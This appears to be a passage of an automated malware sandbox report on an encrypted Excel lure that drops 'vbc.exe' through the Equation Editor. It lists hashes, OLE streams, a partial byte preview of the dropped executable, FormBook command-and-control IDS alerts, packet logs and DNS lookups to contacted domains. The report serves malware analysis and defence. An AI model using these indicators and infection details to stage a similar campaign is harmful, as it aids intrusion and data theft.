                                                                                                                                                          SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                          SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                          C:\Users\user\Desktop\~$Agreement.xlsx
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):330
                                                                                                                                                          Entropy (8bit):1.4377382811115937
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                          MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                          SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                          SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                          SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          C:\Users\Public\vbc.exe
                                                                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):913408
                                                                                                                                                          Entropy (8bit):7.154427701201435
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:pSpEvPye6xWHafjVti8Hul35XH01bi5ZioU1s/Poevs5iyXsvYqXHLs7NvGhqMlW:0qvqe6g6fzHU5X01WTPU1s6
                                                                                                                                                          MD5:F49E0B01E26E5E197421C4260DD87545
                                                                                                                                                          SHA1:CF6ADE9E61D1264AE3EFC371D8B7D13E2F740647
                                                                                                                                                          SHA-256:7DFB2D60095157148FCB26BDFC4270CE6D5E3678C60628B8F683C4E1ADBD8043
                                                                                                                                                          SHA-512:D4BE5DB242754EBE848526D663872BE9239F729D21711E54BC7ED9FE2C5B1BF398F16ACEAD6D5EF829FEB8C7F45E57800F815DF5ECA80C2982ABBDC587B2C537
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....m.`..............P.................. ... ....@.. .......................`............@.................................H...S.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H....... 4..(.......B...8R..............................................(A.....ema.......H.@..k.&XU..U...g...............|.. ...0Y...B....g;.=....y..#.b....J..u.8....xp8g=.......U.*.A.../o).....8...9{..a...;@U.1..M.. <...*..t.).....RG...O...cDA....l...FDN.Jps..:..dF.KP$..q.2.K...2..=....*|/.......c&.K..[....)..4....d.U...;r.`..].....}...5..k.d43..2L,SF_#G."B....S.p.9+....y..Z....sUt.7.R.J.4...|.c.......Y.B4...@.P`.5Wn.MI.M.?.[.....BU*..D.S.....b/p.R..s.

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:CDFV2 Encrypted
                                                                                                                                                          Entropy (8bit):7.99667249740716
                                                                                                                                                          TrID:
                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                          File name:Agreement.xlsx
                                                                                                                                                          File size:2198016
                                                                                                                                                          MD5:199fa59c2168e232c33f2fe8809b78d0
                                                                                                                                                          SHA1:cbf3e8aedfd33ee4a070eef60dfddb87009f5414
                                                                                                                                                          SHA256:aae7b9ac8ddf709b9a6c1f841b90b8468d4a71eeb0fec6e30f1262b726e104ec
                                                                                                                                                          SHA512:082315dd05ca433ca6b1e619bd48cfce332ec3063bddb2ec64a79a9f9afe5a06deb450ea224e589fbfb40c9eddc630a8fe89ffe6d7eb8688c612e518aeaa9fc1
                                                                                                                                                          SSDEEP:49152:gRkiKYXvSVKbfyvrURwxnCBCWOeJT4bysiWWacomXTlEzmANJtq6ozXearVH:8tvSXdtWOAT4+0yo/MzeaVH
                                                                                                                                                          File Content Preview:........................>..................."...................................................................................|.......~...............z.......|.......~...............z.......|.......~......................................................

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                          Static OLE Info

                                                                                                                                                          General

                                                                                                                                                          Document Type:OLE
                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                          OLE File "Agreement.xlsx"

                                                                                                                                                          Indicators

                                                                                                                                                          Has Summary Info:False
                                                                                                                                                          Application Name:unknown
                                                                                                                                                          Encrypted Document:True
                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                          Contains Workbook/Book Stream:False
                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                          Flash Objects Count:
                                                                                                                                                          Contains VBA Macros:False

                                                                                                                                                          Streams

                                                                                                                                                          Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:64
                                                                                                                                                          Entropy:2.73637206947
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                          Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                          Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:112
                                                                                                                                                          Entropy:2.7597816111
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                          Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                          Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:200
                                                                                                                                                          Entropy:3.13335930328
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                          Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                          General
                                                                                                                                                          Stream Path:\x6DataSpaces/Version
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:76
                                                                                                                                                          Entropy:2.79079600998
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                          Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                          Stream Path: EncryptedPackage, File Type: data, Stream Size: 2176952
                                                                                                                                                          General
                                                                                                                                                          Stream Path:EncryptedPackage
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:2176952
                                                                                                                                                          Entropy:7.99988616788
                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                          Data ASCII:. 7 ! . . . . . - D . 2 . . l r . . Y . - . . . . . . b e . . . . . 4 . . D p . m K Z . O . . . . s . = r % $ . ] . . . . . V . . B . r . i o . G . . . . \\ ] z q ! . . & . . J G . . . . \\ ] z q ! . . & . . J G . . . . \\ ] z q ! . . & . . J G . . . . \\ ] z q ! . . & . . J G . . . . \\ ] z q ! . . & . . J G . . . . \\ ] z q ! . . & . . J G . . . . \\ ] z q ! . . & . . J G . . . . \\ ] z q ! . . & . . J G . . . . \\ ] z q ! . . & . . J G . . . . \\ ] z q ! . . & . . J G . . . . \\ ] z q ! . . & . . J G . . . . \\ ] z
                                                                                                                                                          Data Raw:a8 37 21 00 00 00 00 00 2d 44 e6 32 e3 97 6c 72 a5 89 59 0c 2d e7 8e 97 dd d5 06 62 65 e6 9b bb c6 11 34 86 b4 44 70 93 6d 4b 5a c8 4f a4 a5 b7 be 73 aa 3d 72 25 24 8b 5d 87 a1 96 fb 90 56 1e 84 42 07 72 16 69 6f 8f 47 d9 dc dd de 5c 5d 7a 71 21 7f a2 26 a6 16 4a 47 d9 dc dd de 5c 5d 7a 71 21 7f a2 26 a6 16 4a 47 d9 dc dd de 5c 5d 7a 71 21 7f a2 26 a6 16 4a 47 d9 dc dd de 5c 5d 7a
                                                                                                                                                          Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                          General
                                                                                                                                                          Stream Path:EncryptionInfo
                                                                                                                                                          File Type:data
                                                                                                                                                          Stream Size:224
                                                                                                                                                          Entropy:4.52992358042
                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                          Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . . . . Q . . Y L . . . . . 0 . . . . . $ . . . . . N z P . . . . . d . . . . . . . # 6 & / . % . . . . d . . . u w . . t . . > .
                                                                                                                                                          Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                          Network Behavior

                                                                                                                                                          Snort IDS Alerts

                                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                          01/27/21-20:07:24.943316TCP1201ATTACK-RESPONSES 403 Forbidden804916634.102.136.180192.168.2.22
                                                                                                                                                          01/27/21-20:07:40.755338TCP1201ATTACK-RESPONSES 403 Forbidden804916834.102.136.180192.168.2.22
                                                                                                                                                          01/27/21-20:07:46.006191TCP1201ATTACK-RESPONSES 403 Forbidden804916934.102.136.180192.168.2.22
                                                                                                                                                          01/27/21-20:07:51.262766TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.22198.185.159.144
                                                                                                                                                          01/27/21-20:07:51.262766TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.22198.185.159.144
                                                                                                                                                          01/27/21-20:07:51.262766TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.22198.185.159.144

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Jan 27, 2021 20:06:16.115699053 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.157876015 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.158015966 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.158596992 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.200130939 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.200189114 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.200273037 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.200313091 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.200355053 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.200381041 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.200412035 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.200613022 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.241239071 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.241326094 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.241327047 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.241394043 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.241446018 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.241516113 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.241525888 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.241578102 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.241596937 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.241642952 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.241662025 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.241708040 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.241725922 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.241777897 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.241806030 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.241857052 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.282776117 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.282861948 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.282924891 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.282978058 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.282999992 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.283055067 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.283143997 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.283209085 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.283235073 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.283277988 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.283277988 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.283314943 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.283317089 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.283354998 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.283363104 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.283405066 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.283406019 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.283442974 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.283446074 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.283479929 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.283483028 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.283516884 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.283519030 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.283552885 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.283557892 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.283590078 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.283591032 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.283627987 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.283628941 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.283664942 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.283674955 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.283713102 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.284068108 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.324649096 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.324771881 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.324878931 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.324930906 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.324943066 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.324970961 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.324980021 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.325009108 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.325052023 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.325063944 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.325090885 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.325093985 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.325138092 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.325145960 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.325180054 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.325208902 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.325210094 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.325212002 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.325242996 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.325248003 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.325268984 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.325285912 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.325298071 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.325333118 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.325337887 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.325375080 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.325400114 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.325436115 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.325467110 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.325505018 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.325520039 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.325542927 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.325546026 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.325579882 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.325591087 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.325628042 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.325632095 CET4916580192.168.2.2218.194.54.219
                                                                                                                                                          Jan 27, 2021 20:06:16.325669050 CET804916518.194.54.219192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:06:16.325679064 CET4916580192.168.2.2218.194.54.219

                                                                                                                                                          UDP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Jan 27, 2021 20:07:24.683485031 CET5219753192.168.2.228.8.8.8
                                                                                                                                                          Jan 27, 2021 20:07:24.744771004 CET53521978.8.8.8192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:07:34.962502956 CET5309953192.168.2.228.8.8.8
                                                                                                                                                          Jan 27, 2021 20:07:35.030286074 CET53530998.8.8.8192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:07:40.512409925 CET5283853192.168.2.228.8.8.8
                                                                                                                                                          Jan 27, 2021 20:07:40.573688984 CET53528388.8.8.8192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:07:45.761353970 CET6120053192.168.2.228.8.8.8
                                                                                                                                                          Jan 27, 2021 20:07:45.824455023 CET53612008.8.8.8192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:07:51.018945932 CET4954853192.168.2.228.8.8.8
                                                                                                                                                          Jan 27, 2021 20:07:51.093929052 CET53495488.8.8.8192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:07:56.471538067 CET5562753192.168.2.228.8.8.8
                                                                                                                                                          Jan 27, 2021 20:07:56.543636084 CET53556278.8.8.8192.168.2.22
                                                                                                                                                          Jan 27, 2021 20:08:02.182173967 CET5600953192.168.2.228.8.8.8

                                                                                                                                                          DNS Queries

                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                          Jan 27, 2021 20:07:24.683485031 CET192.168.2.228.8.8.80xccffStandard query (0)www.kolamart.comA (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 20:07:34.962502956 CET192.168.2.228.8.8.80x2e78Standard query (0)www.mgg360.comA (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 20:07:40.512409925 CET192.168.2.228.8.8.80x2f03Standard query (0)www.rizrvd.comA (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 20:07:45.761353970 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.activagebenefits.netA (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 20:07:51.018945932 CET192.168.2.228.8.8.80x6ec7Standard query (0)www.usmedicarenow.comA (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 20:07:56.471538067 CET192.168.2.228.8.8.80xf09aStandard query (0)www.ismaelworks.comA (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 20:08:02.182173967 CET192.168.2.228.8.8.80x18f7Standard query (0)www.tuvandadayvitos24h.onlineA (IP address)IN (0x0001)

                                                                                                                                                          DNS Answers

                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                          Jan 27, 2021 20:07:24.744771004 CET8.8.8.8192.168.2.220xccffNo error (0)www.kolamart.comkolamart.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 20:07:24.744771004 CET8.8.8.8192.168.2.220xccffNo error (0)kolamart.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 20:07:35.030286074 CET8.8.8.8192.168.2.220x2e78No error (0)www.mgg360.com66.152.187.17A (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 20:07:40.573688984 CET8.8.8.8192.168.2.220x2f03No error (0)www.rizrvd.comrizrvd.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 20:07:40.573688984 CET8.8.8.8192.168.2.220x2f03No error (0)rizrvd.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 20:07:45.824455023 CET8.8.8.8192.168.2.220x3c4eNo error (0)www.activagebenefits.netactivagebenefits.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 20:07:45.824455023 CET8.8.8.8192.168.2.220x3c4eNo error (0)activagebenefits.net34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 20:07:51.093929052 CET8.8.8.8192.168.2.220x6ec7No error (0)www.usmedicarenow.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 20:07:51.093929052 CET8.8.8.8192.168.2.220x6ec7No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 20:07:51.093929052 CET8.8.8.8192.168.2.220x6ec7No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 20:07:51.093929052 CET8.8.8.8192.168.2.220x6ec7No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 20:07:51.093929052 CET8.8.8.8192.168.2.220x6ec7No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
